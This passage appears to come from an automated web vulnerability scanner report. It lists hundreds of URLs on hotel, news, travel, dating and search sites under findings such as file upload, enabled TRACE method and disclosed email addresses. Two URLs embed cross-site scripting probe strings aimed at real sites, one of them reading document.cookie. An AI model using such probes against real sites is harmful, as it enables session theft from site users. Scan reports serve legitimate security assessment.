18.604. http://www.kampyle.com/

18.605. http://www.ligattsecurity.com/

18.606. http://www.ligattsecurity.com/:nolink

18.607. http://www.ligattsecurity.com/about-us

18.608. http://www.ligattsecurity.com/commercials

18.609. http://www.ligattsecurity.com/font.swf

18.610. http://www.ligattsecurity.com/ligatt-security/wp-admin

18.611. http://www.ligattsecurity.com/solutions

18.612. http://www.ligattsecurity.com/solutions/am-i-hacker-proof

18.613. http://www.ligattsecurity.com/solutions/boobytrap

18.614. http://www.ligattsecurity.com/solutions/hacker-in-15-minutes

18.615. http://www.ligattsecurity.com/wp-content/themes/elite-force/favicon.ico

18.616. http://www.livestrong.com/

18.617. http://www.loansendorsed.com/

18.618. http://www.lodging.com/

18.619. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136

18.620. http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/a

18.621. http://www.mensfitness.com/sports_and_recreation/outdoor_recreation/55

18.622. http://www.millenniumhotels.co.nz/copthorneaucklandcity/index.html

18.623. http://www.millenniumhotels.co.nz/copthornebayofislands/index.html

18.624. http://www.millenniumhotels.co.nz/copthornechristchurchairport/index.html

18.625. http://www.millenniumhotels.co.nz/copthornechristchurchcentral/index.html

18.626. http://www.millenniumhotels.co.nz/copthornechristchurchcity/index.html

18.627. http://www.millenniumhotels.co.nz/copthornedurhamstreet/index.html

18.628. http://www.millenniumhotels.co.nz/copthorneharbourcity/index.html

18.629. http://www.millenniumhotels.co.nz/copthornehokianga/index.html

18.630. http://www.millenniumhotels.co.nz/copthornemarlborough/index.html

18.631. http://www.millenniumhotels.co.nz/copthornenewplymouth/index.html

18.632. http://www.millenniumhotels.co.nz/copthorneorientalbay/index.html

18.633. http://www.millenniumhotels.co.nz/copthornequeenstownlakefront/index.html

18.634. http://www.millenniumhotels.co.nz/copthornewairarapa/index.html

18.635. http://www.millenniumhotels.co.nz/index.html

18.636. http://www.millenniumhotels.co.nz/kingsgateauckland/index.html

18.637. http://www.millenniumhotels.co.nz/kingsgatedunedin/index.html

18.638. http://www.millenniumhotels.co.nz/kingsgategreymouth/index.html

18.639. http://www.millenniumhotels.co.nz/kingsgatehamilton/index.html

18.640. http://www.millenniumhotels.co.nz/kingsgateoamaru/index.html

18.641. http://www.millenniumhotels.co.nz/kingsgatepaihia/index.html

18.642. http://www.millenniumhotels.co.nz/kingsgatepalmerstonnorth/index.html

18.643. http://www.millenniumhotels.co.nz/kingsgatequeenstown/index.html

18.644. http://www.millenniumhotels.co.nz/kingsgaterotorua/index.html

18.645. http://www.millenniumhotels.co.nz/kingsgateteanau/index.html

18.646. http://www.millenniumhotels.co.nz/kingsgatewanganui/index.html

18.647. http://www.millenniumhotels.co.nz/kingsgatewellington/index.html

18.648. http://www.millenniumhotels.co.nz/kingsgatewhangarei/index.html

18.649. http://www.millenniumhotels.co.nz/millenniumchristchurch/index.html

18.650. http://www.millenniumhotels.co.nz/millenniumqueenstown/index.html

18.651. http://www.millenniumhotels.co.nz/millenniumrotorua/index.html

18.652. http://www.millenniumhotels.co.nz/millenniumtaupo/index.html

18.653. http://www.millenniumhotels.co.uk/copthorneaberdeen/index.html

18.654. http://www.millenniumhotels.co.uk/copthornebirmingham/index.html

18.655. http://www.millenniumhotels.co.uk/copthornecardiff/index.html

18.656. http://www.millenniumhotels.co.uk/copthornedudley/index.html

18.657. http://www.millenniumhotels.co.uk/copthorneeffinghamgatwick/index.html

18.658. http://www.millenniumhotels.co.uk/copthornegatwick/index.html

18.659. http://www.millenniumhotels.co.uk/copthornemanchester/index.html

18.660. http://www.millenniumhotels.co.uk/copthornenewcastle/index.html

18.661. http://www.millenniumhotels.co.uk/copthorneplymouth/index.html

18.662. http://www.millenniumhotels.co.uk/copthornereading/index.html

18.663. http://www.millenniumhotels.co.uk/copthornesheffield/index.html

18.664. http://www.millenniumhotels.co.uk/copthornesloughwindsor/index.html

18.665. http://www.millenniumhotels.co.uk/copthornetarakensington/index.html

18.666. http://www.millenniumhotels.co.uk/index.html

18.667. http://www.millenniumhotels.co.uk/millenniumcopthornechelseafc/index.html

18.668. http://www.millenniumhotels.co.uk/millenniumglasgow/index.html

18.669. http://www.millenniumhotels.co.uk/millenniumgloucester/index.html

18.670. http://www.millenniumhotels.co.uk/millenniumkensington/index.html

18.671. http://www.millenniumhotels.co.uk/millenniumknightsbridge/index.html

18.672. http://www.millenniumhotels.co.uk/millenniummayfair/index.html

18.673. http://www.millenniumhotels.co.uk/millenniumreading/index.html

18.674. http://www.millenniumhotels.com/

18.675. http://www.millenniumhotels.com/ae/copthornehoteldubai/index.html

18.676. http://www.millenniumhotels.com/ae/grandmillenniumalwahda/index.html

18.677. http://www.millenniumhotels.com/ae/grandmillenniumdubai/index.html

18.678. http://www.millenniumhotels.com/ae/kingsgateabudhabi/index.html

18.679. http://www.millenniumhotels.com/ae/millenniumabudhabi/index.html

18.680. http://www.millenniumhotels.com/ae/millenniumdubai/index.html

18.681. http://www.millenniumhotels.com/cn/copthorneqingdao/index.html

18.682. http://www.millenniumhotels.com/cn/grandmillenniumbeijing/index.html

18.683. http://www.millenniumhotels.com/cn/millenniumchengdu/index.html

18.684. http://www.millenniumhotels.com/cn/millenniumshanghai/index.html

18.685. http://www.millenniumhotels.com/cn/millenniumwuxi/index.html

18.686. http://www.millenniumhotels.com/cn/millenniumxiamen/index.html

18.687. http://www.millenniumhotels.com/corporate/contact_us/enquiriesReservation.html

18.688. http://www.millenniumhotels.com/corporate/faq/faq.html

18.689. http://www.millenniumhotels.com/corporate/hotels/copthorneHotels.html

18.690. http://www.millenniumhotels.com/corporate/hotels/hotelsMillennium.html

18.691. http://www.millenniumhotels.com/corporate/index.html

18.692. http://www.millenniumhotels.com/corporate/investor_relations/financialLibrary.html

18.693. http://www.millenniumhotels.com/corporate/legalInfo.html

18.694. http://www.millenniumhotels.com/corporate/privacyPolicy.html

18.695. http://www.millenniumhotels.com/corporate/siteMap.html

18.696. http://www.millenniumhotels.com/corporate/termsConditions.html

18.697. http://www.millenniumhotels.com/de/copthornehannover/index.html

18.698. http://www.millenniumhotels.com/de/millenniumstuttgart/index.html

18.699. http://www.millenniumhotels.com/fr/millenniumcharlesdegaulle/index.html

18.700. http://www.millenniumhotels.com/fr/millenniumparis/index.html

18.701. http://www.millenniumhotels.com/id/millenniumjakarta/index.html

18.702. http://www.millenniumhotels.com/index.html

18.703. http://www.millenniumhotels.com/kw/aljahrahcopthornekuwait/index.html

18.704. http://www.millenniumhotels.com/millenniumanchorage/index.html

18.705. http://www.millenniumhotels.com/millenniumboston/attractions/

18.706. http://www.millenniumhotels.com/millenniumboston/attractions/Green_Policy.html

18.707. http://www.millenniumhotels.com/millenniumboston/attractions/Logan_International_Airport.html

18.708. http://www.millenniumhotels.com/millenniumboston/attractions/index.html

18.709. http://www.millenniumhotels.com/millenniumboston/contactus/index.html

18.710. http://www.millenniumhotels.com/millenniumboston/facilities/

18.711. http://www.millenniumhotels.com/millenniumboston/facilities/index.html

18.712. http://www.millenniumhotels.com/millenniumboston/forms/optInForm.html

18.713. http://www.millenniumhotels.com/millenniumboston/gallery/index.html

18.714. http://www.millenniumhotels.com/millenniumboston/index.html

18.715. http://www.millenniumhotels.com/millenniumboston/meeting/index.html

18.716. http://www.millenniumhotels.com/millenniumboston/news/index.html

18.717. http://www.millenniumhotels.com/millenniumboston/restaurant/

18.718. http://www.millenniumhotels.com/millenniumboston/restaurant/index.html

18.719. http://www.millenniumhotels.com/millenniumboston/rooms/

18.720. http://www.millenniumhotels.com/millenniumboston/rooms/index.html

18.721. http://www.millenniumhotels.com/millenniumboston/rooms/suite.html

18.722. http://www.millenniumhotels.com/millenniumboston/specials/index.html

18.723. http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html

18.724. http://www.millenniumhotels.com/millenniumboulder/index.html

18.725. http://www.millenniumhotels.com/millenniumbuffalo/index.html

18.726. http://www.millenniumhotels.com/millenniumchicago/index.html

18.727. http://www.millenniumhotels.com/millenniumcincinnati/index.html

18.728. http://www.millenniumhotels.com/millenniumdurham/index.html

18.729. http://www.millenniumhotels.com/millenniumlosangeles/index.html

18.730. http://www.millenniumhotels.com/millenniumminneapolis/index.html

18.731. http://www.millenniumhotels.com/millenniumnashville/index.html

18.732. http://www.millenniumhotels.com/millenniumnewyork/index.html

18.733. http://www.millenniumhotels.com/millenniumscottsdale/index.html

18.734. http://www.millenniumhotels.com/millenniumstlouis/index.html

18.735. http://www.millenniumhotels.com/millenniumunplazanewyork/index.html

18.736. http://www.millenniumhotels.com/my/copthornepenang/index.html

18.737. http://www.millenniumhotels.com/my/millenniumkualalumpur/index.html

18.738. http://www.millenniumhotels.com/opening/millenniumveetaichung.html

18.739. http://www.millenniumhotels.com/ph/heritagemanila/index.html

18.740. http://www.millenniumhotels.com/premierhotelnewyork/index.html

18.741. http://www.millenniumhotels.com/qa/millenniumdoha/index.html

18.742. http://www.millenniumhotels.com/th/grandmillenniumsukhumvitbangkok/index.html

18.743. http://www.millenniumhotels.com/th/millenniumpatongphuket/index.html

18.744. http://www.millenniumhotels.com.cn/

18.745. http://www.millenniumhotels.com.sg/

18.746. http://www.millenniumhotels.com.sg/StudioMHotel/index.html

18.747. http://www.millenniumhotels.com.sg/copthornekingssingapore/index.html

18.748. http://www.millenniumhotels.com.sg/copthorneorchidsingapore/index.html

18.749. http://www.millenniumhotels.com.sg/grandcopthornewaterfront/index.html

18.750. http://www.millenniumhotels.com.sg/mhotelsingapore/index.html

18.751. http://www.millenniumhotels.com.sg/orchardhotelsingapore/index.html

18.752. http://www.montanaplates.com/

18.753. http://www.montanaplates.com/747natoma.html

18.754. http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html

18.755. http://www.montanaplates.com/index-2.html

18.756. http://www.montanaplates.com/onlineshoppingempire.html

18.757. http://www.montanaplates.com/privacy.html

18.758. http://www.msn.com/

18.759. http://www.msn.com/defaultwpe7.aspx

18.760. http://www.msn.com/sck.aspx

18.761. http://www.msn.com/worldwide.aspx

18.762. http://www.msnbc.msn.com/

18.763. http://www.msnbc.msn.com/id/3032072/ns/business

18.764. http://www.msnbc.msn.com/id/3032076/ns/health

18.765. http://www.msnbc.msn.com/id/3032118/ns/technology_and_science

18.766. http://www.msnbc.msn.com/id/3032507/ns/world_news

18.767. http://www.msnbc.msn.com/id/3032525/ns/us_news

18.768. http://www.msnbc.msn.com/id/3032553/ns/politics

18.769. http://www.msnbc.msn.com/id/3032619/ns/nightly_news/

18.770. http://www.msnbc.msn.com/id/41274431/ns/world_news-weird_news/

18.771. http://www.msnbc.msn.com/id/41292533/ns/technology_and_science-science/

18.772. http://www.msnbc.msn.com/id/41299984/ns/health-cancer/from/toolbar

18.773. http://www.msnbc.msn.com/id/41354775/ns/business-business_of_super_bowl_xlv/

18.774. http://www.msnbc.msn.com/id/41357424/ns/health-kids_and_parenting

18.775. http://www.msnbc.msn.com/id/41359879/ns/us_news-life/

18.776. http://www.msnbc.msn.com/id/41360579/ns/us_news-crime_and_courts

18.777. http://www.msnbc.msn.com/id/41362386/ns/local_news-dallasfort_worth_tx/

18.778. http://www.msnbc.msn.com/id/41362578/ns/local_news-dallasfort_worth_tx/

18.779. http://www.msnbc.msn.com/id/41363059/ns/local_news-dallasfort_worth_tx/

18.780. http://www.msnbc.msn.com/id/41363738/ns/weather

18.781. http://www.msnbc.msn.com/id/41363935/ns/world_news-mideastn_africa/

18.782. http://www.msnbc.msn.com/id/41364449/ns/world_news-the_new_york_times

18.783. http://www.msnbc.msn.com/id/41365053

18.784. http://www.msnbc.msn.com/id/41365053/ns/weather/

18.785. http://www.msnbc.msn.com/id/41366134/ns/world_news-mideastn_africa

18.786. http://www.msnbc.msn.com/id/41367374/ns/world_news-europe

18.787. http://www.mygadgetsblog.info/

18.788. http://www.mywot.com/en/scorecard/2mdn.net

18.789. http://www.no-margin-for-errors.com/

18.790. http://www.nolanfans.com/

18.791. http://www.opensource.org/licenses/gpl-license.php

18.792. http://www.opensource.org/licenses/mit-license.php

18.793. http://www.orbitz.com/

18.794. http://www.orbitz.com/

18.795. http://www.orbitz.com/

18.796. http://www.orbitz.com/App/DPTLandingPageSearch

18.797. http://www.orbitz.com/App/DisplayCarSearch

18.798. http://www.orbitz.com/App/DisplayCarSearch

18.799. http://www.orbitz.com/App/GDDC

18.800. http://www.orbitz.com/App/GDDC

18.801. http://www.orbitz.com/App/Home

18.802. http://www.orbitz.com/App/Home

18.803. http://www.orbitz.com/App/InitDealEdit

18.804. http://www.orbitz.com/App/PerformMDLPDealsContent

18.805. http://www.orbitz.com/App/PerformMDLPDealsContent

18.806. http://www.orbitz.com/App/PerformMDLPDealsContent

18.807. http://www.orbitz.com/App/PerformMDLPDealsContent

18.808. http://www.orbitz.com/App/PerformMDLPDealsContent

18.809. http://www.orbitz.com/App/PerformMDLPDealsContent

18.810. http://www.orbitz.com/App/PerformMDLPDealsContent

18.811. http://www.orbitz.com/App/PerformMDLPDealsContent

18.812. http://www.orbitz.com/App/PerformMDLPDealsContent

18.813. http://www.orbitz.com/App/PerformMDLPDealsContent

18.814. http://www.orbitz.com/App/PrepareActivitiesHome

18.815. http://www.orbitz.com/App/PrepareDealsHome

18.816. http://www.orbitz.com/App/PrepareFlightsTab

18.817. http://www.orbitz.com/App/PrepareSearchResult

18.818. http://www.orbitz.com/App/PrepareVacationsHome

18.819. http://www.orbitz.com/App/Sitemap

18.820. http://www.orbitz.com/App/SubmitQuickSearch

18.821. http://www.orbitz.com/App/ViewRSSHelpPage

18.822. http://www.orbitz.com/App/ViewRSSHelpPage

18.823. http://www.orbitz.com/App/ViewRoundTripSearch

18.824. http://www.orbitz.com/App/ViewRoundTripSearch

18.825. http://www.orbitz.com/App/ViewRoundTripSearch

18.826. http://www.orbitz.com/hotels/

18.827. http://www.orbitz.com/hotels/Canada--ON/Toronto/

18.828. http://www.orbitz.com/hotels/France/Nice/

18.829. http://www.orbitz.com/hotels/France/Paris/

18.830. http://www.orbitz.com/hotels/Mexico/

18.831. http://www.orbitz.com/hotels/Mexico/Cancun/

18.832. http://www.orbitz.com/hotels/Mexico/Playa_Del_Carmen/

18.833. http://www.orbitz.com/hotels/United_Kingdom/London/

18.834. http://www.orbitz.com/hotels/United_States--CA/Los_Angeles/

18.835. http://www.orbitz.com/hotels/United_States--CA/San_Diego/

18.836. http://www.orbitz.com/hotels/United_States--CA/San_Francisco/

18.837. http://www.orbitz.com/hotels/United_States--FL/Miami/

18.838. http://www.orbitz.com/hotels/United_States--FL/Orlando/

18.839. http://www.orbitz.com/hotels/United_States--IL/Chicago/

18.840. http://www.orbitz.com/hotels/United_States--NV/Las_Vegas/

18.841. http://www.orbitz.com/hotels/United_States--NY/New_York/

18.842. http://www.orbitz.com/shop/hotelsearch

18.843. https://www.orbitz.com/Secure/SignIn

18.844. https://www.orbitz.com/account/login

18.845. https://www.orbitz.com/account/registration

18.846. https://www.orbitz.com/trips/writeReview

18.847. http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting

18.848. http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

18.849. http://www.oyster.com/boston/hotels/millennium-bostonian/

18.850. http://www.pctools.com/

18.851. http://www.pctools.com/firewall/

18.852. http://www.pctools.com/free-antivirus/

18.853. http://www.pctools.com/registry-mechanic/

18.854. http://www.pctools.com/spyware-doctor/

18.855. http://www.plentyoffish.com/

18.856. http://www.plentyoffish.com/basicsearch.aspx

18.857. http://www.plentyoffish.com/member1242943.htm

18.858. http://www.plentyoffish.com/member16373418.htm

18.859. http://www.plentyoffish.com/member19992238.htm

18.860. http://www.plentyoffish.com/member22529971.htm

18.861. http://www.plentyoffish.com/member22970699.htm

18.862. http://www.plentyoffish.com/member23010679.htm

18.863. http://www.plentyoffish.com/member23031204.htm

18.864. http://www.plentyoffish.com/member23817184.htm

18.865. http://www.plentyoffish.com/member24663198.htm

18.866. http://www.plentyoffish.com/member24778333.htm

18.867. http://www.plentyoffish.com/member25294614.htm

18.868. http://www.plentyoffish.com/member25300504.htm

18.869. http://www.plentyoffish.com/member25401489.htm

18.870. http://www.plentyoffish.com/member25429166.htm

18.871. http://www.plentyoffish.com/register.aspx

18.872. http://www.plentyoffish.com/suggestions_v2.aspx

18.873. http://www.plentyoffish.com/terms.aspx

18.874. http://www.ppcse.net/

18.875. http://www.proxyhelp.net/

18.876. http://www.ratedesi.com/

18.877. http://www.revresda.com/html.ng/adsize=160x160&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true¤cy=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US

18.878. http://www.revresda.com/html.ng/adsize=728x90&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true¤cy=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US

18.879. http://www.robtex.com/as/as36621.html

18.880. http://www.robtex.com/dns/

18.881. http://www.robtex.com/dns/google.com.html

18.882. http://www.robtex.com/dns/net.html

18.883. http://www.robtex.com/dns/ns1.google.com.html

18.884. http://www.robtex.com/ext/ads/nb728.html

18.885. http://www.robtex.com/ext/ads/nt728.html

18.886. http://www.robtex.com/faq.html

18.887. http://www.scmagazineus.com/search/xss/

18.888. http://www.shape.com/workouts/articles/blood_sugar.html

18.889. http://www.shape.com/workouts/articles/workout_schedule.html

18.890. http://www.stocktrader.org.uk/remote2/ST1-2.php

18.891. http://www.stocktrader.org.uk/widgets/stock-trader-scroller-1.html

18.892. http://www.techmynd.com/cross-site-scripting-attacks-xss/

18.893. http://www.thefreedomtrail.org/

18.894. http://www.theroot.com/multimedia/50-years-black-history

18.895. http://www.theroot.com/views/2011/young-futurists

18.896. http://www.theroot.com/views/meet-25-people-who-will-change-our-world

18.897. http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/

18.898. http://www.theworkbuzz.com/employment-trends/video-interviews/

18.899. http://www.threatexpert.com/

18.900. http://www.threatexpert.com/azlisting.aspx

18.901. http://www.threatexpert.com/catlisting.aspx

18.902. http://www.threatexpert.com/contact.aspx

18.903. http://www.threatexpert.com/default.aspx

18.904. http://www.threatexpert.com/files/a.exe.html

18.905. http://www.threatexpert.com/files/b.exe.html

18.906. http://www.threatexpert.com/files/c.exe.html

18.907. http://www.threatexpert.com/files/msa.exe.html

18.908. http://www.threatexpert.com/files/msxml71.dll.html

18.909. http://www.threatexpert.com/filescan.aspx

18.910. http://www.threatexpert.com/introduction.aspx

18.911. http://www.threatexpert.com/map.aspx

18.912. http://www.threatexpert.com/memoryscanner.aspx

18.913. http://www.threatexpert.com/overview.aspx

18.914. http://www.threatexpert.com/report.aspx

18.915. http://www.threatexpert.com/reports.aspx

18.916. http://www.threatexpert.com/sescan.aspx

18.917. http://www.threatexpert.com/signin.aspx

18.918. http://www.threatexpert.com/signup.aspx

18.919. http://www.threatexpert.com/submissionapplet.aspx

18.920. http://www.threatexpert.com/submit.aspx

18.921. http://www.threatexpert.com/threats.aspx

18.922. http://www.threatexpert.com/threats/adware-bho-gen.html

18.923. http://www.threatexpert.com/threats/trojan-fakealert.html

18.924. http://www.trip.com/

18.925. http://www.ufc.com/

18.926. http://www.unitware.com/

18.927. http://www.veracode.com/security/xss

18.928. http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/

18.929. http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html

18.930. http://www.webveteran.com/

18.931. http://www.wirelessmicrophone.info/

18.932. http://www.wirelessprinter.info/

18.933. http://www.wizzsurf.com/

18.934. http://www.worldmastiffforum.com/

18.935. http://www.xss.com/

18.936. http://www.xssed.com/

19. File upload functionality

19.1. http://translate.google.com/translate_t

19.2. http://www.sitesearch.omniture.com/contact/form_support.htm

19.3. http://www.threatexpert.com/filescan.aspx

19.4. http://www.threatexpert.com/submit.aspx

20. TRACE method is enabled

20.1. http://www.astaro.com/

20.2. https://www.astaro.com/

21. Email addresses disclosed

21.1. http://a.cdn.intentmedia.net/javascripts/intent_media_orbitz_ads_fif.js

21.2. http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js

21.3. https://admin.testandtarget.omniture.com/a

21.4. https://admin.testandtarget.omniture.com/errors/browser_unsupported.jsp

21.5. http://ads.adbrite.com/adserver/vdi/762701

21.6. http://ads.adbrite.com/adserver/vdi/762701

21.7. http://ads.adbrite.com/adserver/vdi/762701

21.8. http://ads.adbrite.com/adserver/vdi/762701

21.9. http://ads.adbrite.com/adserver/vdi/762701

21.10. http://ads.adbrite.com/adserver/vdi/762701

21.11. http://ads.adbrite.com/adserver/vdi/762701

21.12. http://ads.adbrite.com/adserver/vdi/762701

21.13. http://ads.adbrite.com/adserver/vdi/762701

21.14. http://ads.adbrite.com/adserver/vdi/762701

21.15. http://ads.adbrite.com/adserver/vdi/762701

21.16. http://ads.adbrite.com/adserver/vdi/762701

21.17. https://ads.pof.com/

21.18. https://ads.pof.com/Default.aspx

21.19. https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176)

21.20. https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png

21.21. http://ads1.msn.com/library/dap.js

21.22. http://ads1.msn.com/library/dapbeta.js

21.23. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.2/controls.js

21.24. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.2/dragdrop.js

21.25. http://blekko.com/s/images/wait24trans.gif

21.26. http://blekko.com/s/theme19/imgs/plugs/likes_popup2.png

21.27. http://blekko.com/s/theme19/imgs/plugs/mobileapp.png

21.28. http://blekko.com/ws/

21.29. http://blekko.com/ws/+/about

21.30. http://blekko.com/ws/+/adsense=4433512740400217

21.31. http://blekko.com/ws/+/adsense=4433512740400217+/cwe-79

21.32. http://blekko.com/ws/+/adsense=6316080006029695+/cwe-79

21.33. http://blekko.com/ws/+/adsense=7542722322890062

21.34. http://blekko.com/ws/+/adsense=7542722322890062+/cwe-79

21.35. http://blekko.com/ws/+/adsense=7760089209341419

21.36. http://blekko.com/ws/+/adsense=7760089209341419+/cwe-79

21.37. http://blekko.com/ws/+/adsense=9396229490951644

21.38. http://blekko.com/ws/+/adsense=9396229490951644+/cwe-79

21.39. http://blekko.com/ws/+/blekkoapp

21.40. http://blekko.com/ws/+/blekkojobs

21.41. http://blekko.com/ws/+/contact

21.42. http://blekko.com/ws/+/faq

21.43. http://blekko.com/ws/+/help

21.44. http://blekko.com/ws/+/ip=128.83.114.63

21.45. http://blekko.com/ws/+/ip=128.83.114.63+/cwe-79

21.46. http://blekko.com/ws/+/ip=173.236.153.56

21.47. http://blekko.com/ws/+/ip=173.236.153.56+/cwe-79

21.48. http://blekko.com/ws/+/ip=174.136.98.194

21.49. http://blekko.com/ws/+/ip=174.136.98.194+/cwe-79

21.50. http://blekko.com/ws/+/ip=204.9.177.195

21.51. http://blekko.com/ws/+/ip=204.9.177.195+/cwe-79

21.52. http://blekko.com/ws/+/ip=207.46.19.254

21.53. http://blekko.com/ws/+/ip=207.46.19.254+/cwe-79

21.54. http://blekko.com/ws/+/ip=207.97.227.239

21.55. http://blekko.com/ws/+/ip=207.97.227.239+/cwe-79

21.56. http://blekko.com/ws/+/ip=208.80.152.2

21.57. http://blekko.com/ws/+/ip=208.80.152.2+/cwe-79

21.58. http://blekko.com/ws/+/ip=209.107.213.19

21.59. http://blekko.com/ws/+/ip=209.107.213.19+/cwe-79

21.60. http://blekko.com/ws/+/ip=216.34.181.96

21.61. http://blekko.com/ws/+/ip=216.34.181.96+/cwe-79

21.62. http://blekko.com/ws/+/ip=216.48.3.18

21.63. http://blekko.com/ws/+/ip=216.48.3.18+/cwe-79

21.64. http://blekko.com/ws/+/ip=64.15.79.182

21.65. http://blekko.com/ws/+/ip=64.15.79.182+/cwe-79

21.66. http://blekko.com/ws/+/ip=65.55.11.162

21.67. http://blekko.com/ws/+/ip=65.55.11.162+/cwe-79

21.68. http://blekko.com/ws/+/ip=71.41.152.29

21.69. http://blekko.com/ws/+/ip=71.41.152.29+/cwe-79

21.70. http://blekko.com/ws/+/ip=72.14.213.132

21.71. http://blekko.com/ws/+/ip=72.14.213.132+/cwe-79

21.72. http://blekko.com/ws/+/ip=72.32.187.73

21.73. http://blekko.com/ws/+/ip=72.32.187.73+/cwe-79

21.74. http://blekko.com/ws/+/ip=72.32.255.178

21.75. http://blekko.com/ws/+/ip=72.32.255.178+/cwe-79

21.76. http://blekko.com/ws/+/ip=74.125.19.132

21.77. http://blekko.com/ws/+/ip=82.165.200.22+/cwe-79

21.78. http://blekko.com/ws/+/ip=82.165.91.243

21.79. http://blekko.com/ws/+/ip=82.165.91.243+/cwe-79

21.80. http://blekko.com/ws/+/ip=87.230.63.11

21.81. http://blekko.com/ws/+/ip=87.230.63.11+/cwe-79

21.82. http://blekko.com/ws/+/ip=94.23.150.190

21.83. http://blekko.com/ws/+/ip=94.23.150.190+/cwe-79

21.84. http://blekko.com/ws/+/press-videos

21.85. http://blekko.com/ws/+/privacy

21.86. http://blekko.com/ws/+/terms

21.87. http://blekko.com/ws/+/topspam

21.88. http://blekko.com/ws/+/webmaster

21.89. http://blekko.com/ws/+{searchTerms}

21.90. http://blekko.com/ws/cure+for+headaches

21.91. http://blekko.com/ws/global+warming+/liberal

21.92. http://blekko.com/ws/xss

21.93. http://blekko.com/ws/xss%20/cwe-79/

21.94. http://blekko.com/ws/xss%20cloudscan/

21.95. http://blekko.com/ws/xss+/blekko/groundhog-day

21.96. http://blekko.com/ws/xss+/cwe-79

21.97. http://blekko.com/ws/xss+/cwe-79+/site=acunetix.com

21.98. http://blekko.com/ws/xss+/cwe-79+/site=blogs.msdn.com

21.99. http://blekko.com/ws/xss+/cwe-79+/site=cgisecurity.com

21.100. http://blekko.com/ws/xss+/cwe-79+/site=en.wikipedia.org

21.101. http://blekko.com/ws/xss+/cwe-79+/site=f-secure.com

21.102. http://blekko.com/ws/xss+/cwe-79+/site=github.com

21.103. http://blekko.com/ws/xss+/cwe-79+/site=golem.ph.utexas.edu

21.104. http://blekko.com/ws/xss+/cwe-79+/site=googleonlinesecurity.blogspot.com

21.105. http://blekko.com/ws/xss+/cwe-79+/site=ha.ckers.org

21.106. http://blekko.com/ws/xss+/cwe-79+/site=microsoft.com

21.107. http://blekko.com/ws/xss+/cwe-79+/site=owasp.org

21.108. http://blekko.com/ws/xss+/cwe-79+/site=praetorianprefect.com

21.109. http://blekko.com/ws/xss+/cwe-79+/site=scmagazineus.com

21.110. http://blekko.com/ws/xss+/cwe-79+/site=seancoates.com

21.111. http://blekko.com/ws/xss+/cwe-79+/site=techmynd.com

21.112. http://blekko.com/ws/xss+/cwe-79+/site=thespanner.co.uk

21.113. http://blekko.com/ws/xss+/cwe-79+/site=veracode.com

21.114. http://blekko.com/ws/xss+/cwe-79+/site=xss-proxy.sourceforge.net

21.115. http://blekko.com/ws/xss+/cwe-79+/site=xss.com

21.116. http://blekko.com/ws/xss+/cwe-79+/site=xssed.com

21.117. http://blekko.com/ws/xss+/date

21.118. http://blekko.com/ws/xss+/flickr

21.119. http://blekko.com/ws/xss+/foss

21.120. http://blekko.com/ws/xss+/it

21.121. http://blekko.com/ws/xss+/rank

21.122. http://blekko.com/ws/xss+/rss

21.123. http://blekko.com/ws/xss+/shop

21.124. http://blekko.com/ws/xss+/site=acunetix.com

21.125. http://blekko.com/ws/xss+/site=blogs.msdn.com

21.126. http://blekko.com/ws/xss+/site=cgisecurity.com

21.127. http://blekko.com/ws/xss+/site=en.wikipedia.org

21.128. http://blekko.com/ws/xss+/site=f-secure.com

21.129. http://blekko.com/ws/xss+/site=github.com

21.130. http://blekko.com/ws/xss+/site=golem.ph.utexas.edu

21.131. http://blekko.com/ws/xss+/site=googleonlinesecurity.blogspot.com

21.132. http://blekko.com/ws/xss+/site=ha.ckers.org

21.133. http://blekko.com/ws/xss+/site=microsoft.com

21.134. http://blekko.com/ws/xss+/site=owasp.org

21.135. http://blekko.com/ws/xss+/site=praetorianprefect.com

21.136. http://blekko.com/ws/xss+/site=scmagazineus.com

21.137. http://blekko.com/ws/xss+/site=seancoates.com

21.138. http://blekko.com/ws/xss+/site=techmynd.com

21.139. http://blekko.com/ws/xss+/site=thespanner.co.uk

21.140. http://blekko.com/ws/xss+/site=veracode.com

21.141. http://blekko.com/ws/xss+/site=xss-proxy.sourceforge.net

21.142. http://blekko.com/ws/xss+/site=xss.com

21.143. http://blekko.com/ws/xss+/site=xssed.com

21.144. http://blekko.com/ws/xss+/techblogs

21.145. http://blekko.com/ws/xss+/technology

21.146. http://blekko.com/ws/xss+/youtube

21.147. http://blekko.com/ws/xss+clouds+can

21.148. http://blekko.com/ws/xss+cloudscan

